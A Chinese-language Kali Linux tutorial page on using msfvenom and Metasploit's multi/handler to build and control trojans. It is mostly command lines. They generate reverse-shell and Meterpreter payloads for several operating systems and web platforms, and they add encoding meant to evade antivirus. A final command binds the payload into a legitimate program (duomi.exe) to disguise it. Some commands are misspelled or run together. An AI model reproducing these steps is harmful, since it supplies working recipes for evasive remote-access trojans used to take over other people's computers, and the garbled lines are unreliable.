kali linux渗透入门(3)

利用 Msfvenom 生成木马,实现远程控制

1.针对不同的系统 输入不同的命令,可以在 reverse_tcp 后加上 -e x86/shikata_ga_nai -i 5 -b '0x00' 作为混淆编码,5为编码次数,次数越高可以躲掉部分杀毒软件。

 Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho
Web Payloads
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.phpcat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
Scripting Payloads
Python
msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl


2.使用handler模块

进入msfconsole  

msf5> use exploit/multi/handler 

3. 设置PAYPLOAD,并把一开始的exe配置文件配置在kali上

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf5 exploit(multi/handler) >set  lhost  

msf5 exploit(multi/handler) >set  lport  

4.查看设置

show options

5.设置

set lhost XXXX

set lport XXXX

6.攻击

exploit

最后效果图,连接成功

kali linux渗透入门(3)_第1张图片

7.如果实现exe 绑定其他程序

msfvenom -p windows/meterpreter/reserve_tcp lhost=192.168.0.118 lport=4444 -x duomi.exe(要绑定的软件的名字,放在同一目录) -k -f exe -o duomi.exe

后面的操作一样,use exploit/mulit/handler ``````

你可能感兴趣的:(linux)